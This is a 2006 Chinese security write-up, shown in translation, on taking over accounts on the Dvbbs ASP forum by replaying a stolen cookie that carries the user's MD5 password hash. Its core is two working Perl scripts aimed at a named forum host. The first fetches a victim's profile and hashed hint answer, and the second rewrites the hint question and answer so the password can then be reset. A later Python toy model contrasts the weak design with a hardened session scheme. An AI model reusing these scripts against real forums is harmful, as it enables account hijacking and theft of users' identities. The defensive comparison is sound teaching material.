Bypassing the Password-Encryption Limitation of the Dvbbs (动网先锋) ASP Forum
Source: 电脑安全 (Computer Security) - 电脑教程网
Date: 2006-10-19
Security analysis of the Dvbbs (动网先锋) ASP forum: cross-site scripting

The Dvbbs forum stores the password and the answer to the password-hint question as MD5 hashes, so a stolen cookie seems to be of little value on its own, since the hash cannot be reversed to the plaintext password. We can take a different approach: once we have the cookie, send one request to fetch the user's profile, then send a second request to change the user's hint question and answer. Disclaimer: the two scripts below are for reference only; do not use them for illegal purposes, or you bear all consequences! hiallone is a user I registered on the Dvbbs forum for testing; you can see the demonstration at http://enter.3322.net/cgi-bin/dongw.cgi and http://enter.3322.net/cgi-bin/dongw1.cgi

#!/usr/bin/perl
# Fetch the user's profile
# http://enter.3322.net/cgi-bin/dongw.cgi
use Socket;

$host = "bbs.aspsky.net";
$port = 80;
$str  = "";                 # empty POST body
$len  = length($str);

# Replay the captured aspsky cookie (it carries the MD5 password hash) against the profile-edit page
$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n" .
       "Host: $host\r\n" .
       "Accept: */*\r\n" .
       "Cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=论坛游民&upNum=1;\r\n" .
       "Content-Type: application/x-www-form-urlencoded\r\n" .
       "Content-Length: $len\r\n\r\n" .
       "$str";

@re = sendraw($req);
print "Content-type: text/html\n\n";   # runs as a CGI script and echoes the forum's response
print "@re";

# Send a raw HTTP request to $host:$port and return the response lines
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack("SnA4x8", 2, $port, $target))) {
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    } else {
        die("Can't connect...\n");
    }
}

------------------------------------------------

#!/usr/bin/perl
# Change the hint question and answer; here we can set quesion=whoami21&answer=superdao
# After that you can go and change the password, heh!
# http://enter.3322.net/cgi-bin/dongw1.cgi
use Socket;

$host = "bbs.aspsky.net";
$port = 80;
# Form body of the profile-update page; oldanswer is the hashed current answer taken from the profile fetched above
$str  = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=Pic/Image1.gif&myface=Pic/Image1.gif&width=22&height=22&URL=&groupname=无门无派&OICQ=&ICQ=&msn=&showRe=1&Signature=&usercookies=0&Submit=更 新';
$len  = length($str);

$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n" .
       "Host: $host\r\n" .
       "Accept-Language: zh-cn\r\n" .
       "Content-Type: application/x-www-form-urlencoded\r\n" .
       "Accept-Encoding: gzip, deflate\r\n" .
       "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n" .
       "Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=论坛游民&username=hiallone&usercookies=0\r\n" .
       "Content-Length: $len\r\n" .
       "Connection: Keep-Alive\r\n\r\n" .
       "$str";

@re = sendraw($req);
print "Content-type: text/html\n\n";
print "@re";

# Send a raw HTTP request to $host:$port and return the response lines
sub sendraw {
    my ($req) = @_;
    my $target = inet_aton($host) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack("SnA4x8", 2, $port, $target))) {
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    } else {
        die("Can't connect...\n");
    }
}
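The two scripts above work because of two design choices, not because MD5 is broken: the cookie carries the stored password hash and the server accepts that hash as the credential (so a stolen cookie is replayable indefinitely), and the profile form hands back the hashed hint answer that the update handler then checks. The following Python model is an added example written for this page, not Dvbbs code: `LegacyForum` reproduces those two behaviours in miniature, and `HardenedForum` is an assumed design (opaque random session id, HttpOnly cookie, and re-authentication with the current password before the hint question can change) that the page does not describe. The account values are constructed.

```python
"""
Toy model of the weakness the write-up exploits, beside a hardened design.

Constructed for illustration; not Dvbbs code. LegacyForum mirrors what the write-up
shows: the cookie carries the MD5 password hash, the server treats that hash as the
credential, and the profile form exposes the hashed hint answer (the "oldanswer"
field) that the update handler checks. HardenedForum is an assumed design.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed sample account (made-up values, not taken from any real forum)
USERNAME = "demo_user"
PASSWORD = "correct horse"
HINT_Q, HINT_A = "first pet?", "rex"


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


class LegacyForum:
    """Accepts the stored MD5 hash itself as proof of identity (pass-the-hash)."""

    def __init__(self):
        self.users = {USERNAME: {"pwhash": md5_hex(PASSWORD),
                                 "q": HINT_Q, "ahash": md5_hex(HINT_A)}}

    def cookie_for(self, username, password):
        # The client is handed the hash; whoever holds the cookie holds the credential.
        return f"aspsky=password={md5_hex(password)}&username={username}"

    def _user_from_cookie(self, cookie):
        fields = parse_qs(cookie.split("=", 1)[1])
        name, pwhash = fields["username"][0], fields["password"][0]
        user = self.users.get(name)
        return user if user and hmac.compare_digest(user["pwhash"], pwhash) else None

    def profile_form(self, cookie):
        # Like MYMODIFY.ASP in the write-up: the form echoes the hashed current answer.
        user = self._user_from_cookie(cookie)
        return {"oldanswer": user["ahash"]} if user else None

    def update_hint(self, cookie, oldanswer, new_q, new_a):
        user = self._user_from_cookie(cookie)
        if not user or not hmac.compare_digest(user["ahash"], oldanswer):
            return False
        user["q"], user["ahash"] = new_q, md5_hex(new_a)
        return True


class HardenedForum:
    """Opaque server-side session; recovery-data changes require the current password."""

    def __init__(self):
        self.users, self.sessions = {}, {}
        salt = secrets.token_bytes(16)
        self.users[USERNAME] = {"salt": salt, "pwhash": self._kdf(PASSWORD, salt),
                                "q": HINT_Q, "ahash": self._kdf(HINT_A, salt)}

    @staticmethod
    def _kdf(secret, salt):
        return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)

    def login(self, username, password):
        user = self.users.get(username)
        if not user or not hmac.compare_digest(user["pwhash"], self._kdf(password, user["salt"])):
            return None
        sid = secrets.token_urlsafe(32)          # random id, carries no credential
        self.sessions[sid] = username
        return sid

    def set_cookie_header(self, sid):
        # HttpOnly keeps the cookie away from injected script; Secure keeps it off plain HTTP.
        return f"Set-Cookie: sid={sid}; HttpOnly; Secure; SameSite=Lax"

    def update_hint(self, sid, current_password, new_q, new_a):
        username = self.sessions.get(sid)
        if username is None:
            return False
        user = self.users[username]
        # Re-authentication: a stolen session alone is not enough to change recovery data.
        if not hmac.compare_digest(user["pwhash"], self._kdf(current_password, user["salt"])):
            return False
        user["q"], user["ahash"] = new_q, self._kdf(new_a, user["salt"])
        return True


def demo():
    """Replays a captured cookie/session against both models; returns (legacy_ok, hardened_ok)."""
    legacy = LegacyForum()
    captured_cookie = legacy.cookie_for(USERNAME, PASSWORD)       # what the XSS hands over
    form = legacy.profile_form(captured_cookie)                    # request 1: read hashed old answer
    legacy_ok = legacy.update_hint(captured_cookie, form["oldanswer"], "new q", "new a")  # request 2

    hard = HardenedForum()
    captured_sid = hard.login(USERNAME, PASSWORD)
    hardened_ok = hard.update_hint(captured_sid, "wrong guess", "new q", "new a")
    return legacy_ok, hardened_ok


if __name__ == "__main__":
    print(demo())   # (True, False)
```

`demo()` walks the two-request sequence from the page against `LegacyForum` and succeeds, then shows that the same captured session against `HardenedForum` fails without the current password. The design point is that the cookie must be a pointer to server-side state, never the credential itself, and that anything touching account recovery must re-verify the user rather than trust a value the server just echoed into the form.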